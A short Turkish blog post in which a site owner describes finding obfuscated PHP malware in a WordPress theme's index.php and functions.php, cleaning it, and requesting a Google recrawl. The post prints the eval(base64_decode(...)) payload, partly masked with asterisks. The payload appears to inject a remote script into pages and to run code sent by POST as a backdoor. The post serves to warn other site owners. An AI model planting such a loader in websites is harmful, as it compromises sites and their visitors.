Virüsler sürekli değişiyor ve gelişiyor. Yakın zaman içinde IFRAME Virüsü yaygınken şimdi de bu çıktı. Bir blogum Google tarafından zararlı site olarak gösteriliyordu. O an aklıma yazdığım şu yazıdaki kurallar geldi. Bu kurallar virüs bulaşmasına karşı alabileceğimiz önlemlerdi.

Sitemin kodlarını incelidiğim zaman index.php ve functions.php dosyalarında <-?php get_header(); ?-> tagından önce şifrelenmiş bir php kodu buldum. Bu kodları temizledim ve Google Web Araçları’ndan yeniden tarama istedim. Şimdilik sonucu bekliyorum. Büyük ihtimal düzelecek.

Bulduğum kod ise şöyleydi:

<?php eval(base64_decode(‘aWYoI**********************************

****diwnIycpLicuKj88L2lmcmFtZT4jaXMnL

CcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQS

E5qY21sd2RDQnpjbU05YUhS

MGNEb3ZMMjlzWVdZdWMyVXZjMmwwWlY5dmJHUXZaM

kZ0WlhNdWNHaHdJRDQ4TDNOamNtbHdkRDQ

9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5Jykp

JHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5

KSNtaScsJGEuJ1wxJywkcywxKTtlbHNlaWYoc3RycG9zKC

RzLCc8YScpKSRzPSRhLiRzO3JldH

VybiRz******************yYXkoKTtpZihmdW5jdGlvbl9l

eGlzdHMoJGMzbGhkMSkpY2FsbF91c

2VyX2Z1bmMoJGMz**************************duYW1lJ10p

PT0nYzNsaGQnKXJldHVybjtlbHNlaWYoJ

GE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF

5KCRhPT0nZGVmYXVsdCBvdXR

wd******************************1bMV09b2JfZ2V0X2NvbnRlb

nRzKCk7b2JfZW5kX2NsZWFuKCk7f

W9iX3N0YXJ0KCdjM2xoZCcpO2ZvcigkaT0wOyRpPGNvd

W50KCRzKTskaSsr********************xoZG

w9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ2MzbGhkM

icpKSE9J2MzbGhkMicpPyRhOjA7ZXZhbChi

YXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7′)); ?>

Not: Kodda yer alan ***’ları ben koydum. Bir sorun yaratmaması için.